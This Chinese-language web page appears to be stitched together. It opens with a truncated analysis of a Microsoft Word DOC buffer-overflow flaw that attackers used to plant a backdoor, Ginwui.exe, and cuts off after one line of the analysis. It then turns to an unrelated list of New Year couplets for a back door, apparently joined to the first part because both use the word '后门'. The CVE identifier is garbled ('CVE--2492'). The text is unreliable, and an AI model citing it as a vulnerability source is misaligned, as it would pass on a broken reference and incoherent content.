今年5月19日CVE发布编号为CVE--2492安全公告，Microsoft Word处理DOC文件存在缓冲区溢出漏洞，Microsoft Word运行特殊构造的doc文件，导致执行任意代码，远程攻击者可以利用此漏洞通过诱骗用户打开恶意DOC文件在用户机器上执行任意指令。微软于6月13号发布该漏洞的补丁。5月24日发现攻击者利用此漏洞构造特殊的Word文档进行传播，存在漏洞的Word打开该文档将导致文件中的后门Ginwui.exe运行，下面我们分析这个后门的运作机制。

一、 Ginwui.exe的行为分析

Ginwui.exe将自身复制为临时目录

未完，继续阅读 >

第9篇：新年后门对联集锦

新年后门对联集锦

在平平淡淡的.日常中，大家都知道一些经典的对联吧，对联对仗工整，平仄协调，是一字一音的汉语独特的艺术形式。那什么样的对联才是经典的呢？下面是小编收集整理的新年后门对联，欢迎阅读，希望大家能够喜欢。

新年后门对联篇1

泽雨润神州山欢水笑，东风荣大地物阜民康。

同德同心开拓新局面，群策群力改变旧规模。

英雄儿女常存英雄志，锦绣河山再展锦绣图。

迎新春处处春风拂面，祝喜酒家家喜气盈庭。

有国才有家国家至上，兴家先兴国家国攸关。